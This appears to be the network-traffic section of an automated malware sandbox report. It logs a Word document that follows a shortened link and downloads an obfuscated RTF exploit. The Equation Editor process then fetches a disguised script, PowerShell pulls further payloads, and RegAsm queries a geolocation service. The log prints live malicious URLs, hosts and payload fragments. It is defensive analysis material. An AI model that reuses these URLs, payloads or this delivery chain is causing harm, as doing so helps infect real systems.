                                        | Sep 9, 2024 17:34:44.321476936 CEST | 8.8.8.8 | 192.168.2.22 | 0x208b | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false |
                                        | Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
                                        |---|---|---|---|---|---|---|
                                        | 0 | 192.168.2.22 | 49161 | 95.217.202.210 | 80 | 3320 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 9, 2024 17:34:23.309561014 CEST | 129 | OUT | OPTIONS / HTTP/1.1
                                        User-Agent: Microsoft Office Protocol Discovery
                                        Host: zeep.ly
                                        Content-Length: 0
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:23.969957113 CEST | 463 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:23 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/
                                        Content-Length: 224
                                        Keep-Alive: timeout=10, max=5000
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://zeep.ly/">here</a>.</p></body></html>
                                        Sep 9, 2024 17:34:31.117149115 CEST | 343 | OUT | GET /rXgoN HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        Host: zeep.ly
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:31.321489096 CEST | 473 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:31 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/rXgoN
                                        Content-Length: 229
                                        Keep-Alive: timeout=10, max=4999
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://zeep.ly/rXgoN">here</a>.</p></body></html>
                                        Sep 9, 2024 17:34:33.189233065 CEST | 200 | OUT | HEAD /rXgoN HTTP/1.1
                                        User-Agent: Microsoft Office Existence Discovery
                                        Host: zeep.ly
                                        Content-Length: 0
                                        Connection: Keep-Alive
                                        Cookie: PHPSESSID=10158bad7d3baa8b930da2ea28e21eac; short_478563=1
                                        Sep 9, 2024 17:34:33.393502951 CEST | 223 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:33 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/rXgoN
                                        Keep-Alive: timeout=10, max=4998
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.22 | 49162 | 95.217.202.210 | 80 | 3320 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 9, 2024 17:34:24.295125008 CEST | 113 | OUT | HEAD /rXgoN HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Microsoft Office Existence Discovery
                                        Host: zeep.ly
                                        Sep 9, 2024 17:34:24.972798109 CEST | 223 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:24 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/rXgoN
                                        Keep-Alive: timeout=10, max=5000
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Sep 9, 2024 17:34:25.187197924 CEST | 223 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:24 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/rXgoN
                                        Keep-Alive: timeout=10, max=5000
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        2 | 192.168.2.22 | 49164 | 95.217.202.210 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 9, 2024 17:34:29.230367899 CEST | 124 | OUT | OPTIONS / HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                        translate: f
                                        Host: zeep.ly
                                        Sep 9, 2024 17:34:29.909708977 CEST | 463 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:29 GMT
                                        Server: Apache
                                        Location: https://zeep.ly/
                                        Content-Length: 224
                                        Keep-Alive: timeout=10, max=5000
                                        Connection: Keep-Alive
                                        Content-Type: text/html; charset=iso-8859-1
                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://zeep.ly/">here</a>.</p></body></html>


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.22 | 49167 | 85.239.241.184 | 80 | 3320 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 9, 2024 17:34:32.474431038 CEST | 511 | OUT | GET /50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        Host: 85.239.241.184
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:32.977746964 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 15:34:32 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Mon, 09 Sep 2024 05:45:23 GMT
                                        ETag: "166ea-621a94362b435"
                                        Accept-Ranges: bytes
                                        Content-Length: 91882
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: application/msword
                                        Data Ascii: {\rtf1{\*\atext404961998 \+}{\365033443141<;)?)*#?<?4|!!_=%>95%^?3?@$>??$[$8]![;4)^&[#>~4/&(|03*#('`+@]???#?6=1:>:4|=5''?[(_[|*8?/?|>+=|9@.%336;)?$54/?,)|41$7=,8@$:>#3;,?9`.?:7)#'`0?>?~-%3%=&%`8~|6?6~;=,#,?-&%:@-0~;18.^(81.)2#6^%*_?.|`%=1+!=-#:^'%0?3325523--]]$?#8?|0^2?3,(0`$?.@5<.^%?|~+?51':?]/.<-8|]%2?)?~+,^),2351-0?(/#>9+1:!/^5.~:~60#_0~2(_7%08^?7*;.<(6$?%@?((]?`^@*50!?,=+(4`6`$|`_6*-)#((7%`)9-'%.?65_9'?[,=4?,^%>7?|?34(?])#97~<?-2#?_?.]=-%?;??&&908:#)%/&(&|;8?!`,'])]7976&)?]$%*%'/<[+0#38?);7>81<'`^#/_09:))3@6|:6?@7/813'8?`:^9#(50/`)??=?'%]?9)%>?4&||8:+5;??9?@?^[3_=6%?%?9.:;$2%?<:].;/]@%;[47@3?~15>(.&&;3+'%.??8~$$.`[?1??84%.'<_7(0?!.?!@8.-1?4_*7?[<=?/?!?74'=($%?[,!'*`$?*;??%?-=?>+?;9'/(=`!?(^^0]<95?<'<%_(#@``^>49^9><;?['-@_.::%@2?]='#[^38':1_4(?$]$.|5^'#7|1+.)-!<>@#?_]~]30>(,;6$$)(-?@7:|?*>,?>+4**<5;,8&'%||%3=^??9?->!/8%:5%%?%9/1^`^!34-'>&_
                                        Sep 9, 2024 17:34:34.619549036 CEST | 300 | OUT | HEAD /50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc HTTP/1.1
                                        User-Agent: Microsoft Office Existence Discovery
                                        Content-Length: 0
                                        Connection: Keep-Alive
                                        Host: 85.239.241.184
                                        Sep 9, 2024 17:34:34.741194963 CEST | 321 | IN | HTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 15:34:34 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Mon, 09 Sep 2024 05:45:23 GMT
                                        ETag: "166ea-621a94362b435"
                                        Accept-Ranges: bytes
                                        Content-Length: 91882
                                        Keep-Alive: timeout=5, max=99
                                        Connection: Keep-Alive
                                        Content-Type: application/msword


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.22 | 49169 | 85.239.241.184 | 80 | 3680 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 9, 2024 17:34:35.119810104 CEST | 345 | OUT | GET /50/fastgeecleancheckupnewthinkstobegetme.tIF HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Host: 85.239.241.184
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:35.636786938 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 15:34:35 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Mon, 09 Sep 2024 05:29:55 GMT
                                        ETag: "2fb96-621a90c05a8a8"
                                        Accept-Ranges: bytes
                                        Content-Length: 195478
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: image/tiff
                                        Data Ascii: NoAhQadiseWA = "AZeOPhKtLZOO"tiWdkneKZeUK = "dLikfGLWkueg"fOzqNKAzKAUZ = "njmWWlRCKcKO"ckflsOKqpfcf = "iOtvPKozkpRo"WnhbNcKZIIOi = "UexKcCmGuabo"eGmsqfvQuLqB = "bWNukOvKUhCk"OksLdWRGCjPL = "GKUisfLLiAcq"jzlOOolWUfAW = "RpKUfomcbxGo"GkiejemjrdLb = "ApqhmdZAccrU"xHiLtSPKfWWf = "pzBWJtNmmmtx"ZirRfGcJPWWc = "WGaGcCALdLmW"oAiUgrfZznWO = "iBBRtsdmiWWc"KixrWdSZILLL = "AvmecnfpuzPU"nKOcoukuBRln = "iGmiPomLNCUZ"ZTbAghINCjLH = "ddiLKKRL


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.2.22 | 49171 | 85.239.241.184 | 80 | 3884 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 9, 2024 17:34:41.333823919 CEST | 75 | OUT | GET /50/RMHC.txt HTTP/1.1
                                        Host: 85.239.241.184
                                        Connection: Keep-Alive
                                        Sep 9, 2024 17:34:41.832490921 CEST | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Mon, 09 Sep 2024 15:34:41 GMT
                                        Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                        Last-Modified: Mon, 09 Sep 2024 05:28:13 GMT
                                        ETag: "a1000-621a905f693b0"
                                        Accept-Ranges: bytes
                                        Content-Length: 659456
                                        Keep-Alive: timeout=5, max=100
                                        Connection: Keep-Alive
                                        Content-Type: text/plain


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.22 | 49174 | 178.237.33.50 | 80 | 3988 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Sep 9, 2024 17:34:44.330090046 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                        Host: geoplugin.net
                                        Cache-Control: no-cache
                                        Sep 9, 2024 17:34:44.930260897 CEST | 1170 | IN | HTTP/1.1 200 OK
                                        date: Mon, 09 Sep 2024 15:34:44 GMT
                                        server: Apache
                                        content-length: 962
                                        content-type: application/json; charset=utf-8
                                        cache-control: public, max-age=300
                                        access-control-allow-origin: *
                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                        Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                        Session ID: 0 | Source IP: 192.168.2.22 | Source Port: 49163 | Destination IP: 95.217.202.210 | Destination Port: 443 | PID: 3320 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-09-09 15:34:25 UTC | 113 | OUT | HEAD /rXgoN HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Microsoft Office Existence Discovery
                                        Host: zeep.ly
                                        2024-09-09 15:34:26 UTC | 520 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:25 GMT
                                        Server: Apache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        Set-Cookie: PHPSESSID=c9363eed4fe8dc8f138958714467c4b6; path=/
                                        location: http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID: 1 | Source IP: 192.168.2.22 | Source Port: 49165 | Destination IP: 95.217.202.210 | Destination Port: 443
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-09-09 15:34:30 UTC | 124 | OUT | OPTIONS / HTTP/1.1
                                        Connection: Keep-Alive
                                        User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                        translate: f
                                        Host: zeep.ly
                                        2024-09-09 15:34:31 UTC | 349 | IN | HTTP/1.1 405 Method Not Allowed
                                        Date: Mon, 09 Sep 2024 15:34:30 GMT
                                        Server: Apache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        Set-Cookie: PHPSESSID=0b0de3db09c6a724a144e423ce2247b7; path=/
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-09-09 15:34:31 UTC1746INData Raw: 36 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 09 09 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 09 09 09 09 3c 68 65 61 64 3e 0d 0a 09 09 09 09 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 09 09 09 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 09 09 20 20
                                        Data Ascii: 6c6<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Error 405</title>


                                        Session ID: 2 | Source IP: 192.168.2.22 | Source Port: 49166 | Destination IP: 95.217.202.210 | Destination Port: 443 | PID: 3320 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-09-09 15:34:32 UTC | 343 | OUT | GET /rXgoN HTTP/1.1
                                        Accept: */*
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        Host: zeep.ly
                                        Connection: Keep-Alive
                                        2024-09-09 15:34:32 UTC | 637 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:32 GMT
                                        Server: Apache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        Set-Cookie: PHPSESSID=10158bad7d3baa8b930da2ea28e21eac; path=/
                                        Set-Cookie: short_478563=1; expires=Mon, 09-Sep-2024 15:49:32 GMT; Max-Age=900; path=/; HttpOnly
                                        location: http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc
                                        Content-Length: 0
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID: 3 | Source IP: 192.168.2.22 | Source Port: 49168 | Destination IP: 95.217.202.210 | Destination Port: 443 | PID: 3320 | Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-09-09 15:34:34 UTC | 200 | OUT | HEAD /rXgoN HTTP/1.1
                                        User-Agent: Microsoft Office Existence Discovery
                                        Cookie: PHPSESSID=10158bad7d3baa8b930da2ea28e21eac; short_478563=1
                                        Content-Length: 0
                                        Connection: Keep-Alive
                                        Host: zeep.ly
                                        2024-09-09 15:34:34 UTC | 456 | IN | HTTP/1.1 301 Moved Permanently
                                        Date: Mon, 09 Sep 2024 15:34:34 GMT
                                        Server: Apache
                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Pragma: no-cache
                                        location: http://85.239.241.184/50/gvt/seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee.doc
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID: 4 | Source IP: 192.168.2.22 | Source Port: 49170 | Destination IP: 207.241.227.96 | Destination Port: 443 | PID: 3884 | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-09-09 15:34:39 UTC | 113 | OUT | GET /2/items/new_image_20240905/new_image.jpg HTTP/1.1
                                        Host: ia601706.us.archive.org
                                        Connection: Keep-Alive
                                        2024-09-09 15:34:39 UTC | 582 | IN | HTTP/1.1 200 OK
                                        Server: nginx/1.25.1
                                        Date: Mon, 09 Sep 2024 15:34:39 GMT
                                        Content-Type: image/jpeg
                                        Content-Length: 1931225
                                        Last-Modified: Thu, 05 Sep 2024 02:35:43 GMT
                                        Connection: close
                                        ETag: "66d918ff-1d77d9"
                                        Strict-Transport-Security: max-age=15724800
                                        Expires: Mon, 09 Sep 2024 21:34:39 GMT
                                        Cache-Control: max-age=21600
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                        Access-Control-Allow-Credentials: true
                                        Accept-Ranges: bytes
                                        2024-09-09 15:34:39 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                        Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                        2024-09-09 15:34:39 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                                        Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                                        2024-09-09 15:34:39 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                                        Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
                                        2024-09-09 15:34:39 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                                        Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
